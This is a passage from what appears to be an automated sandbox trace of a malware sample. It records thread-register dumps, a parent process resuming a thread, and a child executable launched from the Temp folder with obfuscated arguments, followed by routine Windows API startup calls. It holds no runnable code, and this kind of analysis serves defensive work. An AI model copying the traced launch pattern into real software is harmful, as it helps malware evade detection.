ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, 
[190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, 
[371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0096.540] ResumeThread (hThread=0x48) returned 0x1 [0096.540] CloseHandle (hObject=0x48) returned 1 [0096.540] CloseHandle (hObject=0x4c) returned 1 [0096.540] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.541] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0096.541] ExitProcess (uExitCode=0x0) Process: id = "15" image_name = "yaqb5zg8.exe" filename = 
"c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe" page_root = "0x7ea16820" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xb0c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 944 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 945 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 946 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 947 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "yaqb5zg8.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe") Region: id = 948 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 949 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 
"c:\\windows\\system32\\apisetschema.dll") Region: id = 950 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 951 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 952 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 953 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 954 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 955 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 956 start_va = 0x240000 end_va = 0x2a6fff entry_point = 0x240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 957 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 958 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 959 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 960 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 961 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 962 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 963 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 964 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 965 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 966 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 967 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1038 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1039 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1040 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1041 start_va = 0x5a0000 
end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1042 start_va = 0x11a0000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1336 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1337 start_va = 0x11a0000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1338 start_va = 0x1380000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1339 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 1340 start_va = 0x1340000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1341 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1342 start_va = 0x3a0000 end_va = 0x3a2fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1343 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Thread: id = 16 os_tid = 0xb5c [0096.085] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x778dee60, dwHighDateTime=0x1d440a9)) [0096.085] GetCurrentProcessId () returned 0xb58 [0096.085] GetCurrentThreadId () returned 0xb5c [0096.085] GetTickCount () returned 0x230c0 [0096.085] QueryPerformanceCounter (in: 
lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15287440672) returned 1 [0096.085] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0096.086] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.086] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0096.086] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0096.087] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.088] GetCurrentThreadId () returned 0xb5c [0096.088] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13807d0)) [0096.088] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0096.088] GetFileType (hFile=0x3) returned 0x0 [0096.088] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0096.088] GetFileType (hFile=0x7) returned 0x0 [0096.088] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0096.088] GetFileType (hFile=0xb) returned 0x0 [0096.088] SetHandleCount (uNumber=0x20) returned 0x20 [0096.088] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0096.088] GetEnvironmentStringsW () returned 0x14fc70* [0096.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0096.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13811f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0096.088] FreeEnvironmentStringsW (penv=0x14fc70) returned 1 [0096.088] GetLastError () returned 0x6 [0096.088] SetLastError (dwErrCode=0x6) [0096.088] GetLastError () returned 0x6 [0096.088] SetLastError (dwErrCode=0x6) [0096.088] GetLastError () returned 0x6 [0096.088] SetLastError (dwErrCode=0x6) [0096.088] GetACP () returned 0x4e4 [0096.089] GetLastError () returned 0x6 [0096.089] SetLastError (dwErrCode=0x6) [0096.089] IsValidCodePage (CodePage=0x4e4) returned 1 [0096.089] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0096.089] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0096.089] GetLastError () returned 0x6 [0096.089] SetLastError (dwErrCode=0x6) [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) 
returned 256 [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0096.089] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0096.089] GetLastError () returned 0x6 [0096.089] SetLastError (dwErrCode=0x6) [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0096.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ") returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0096.090] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿׯﭸശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0096.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2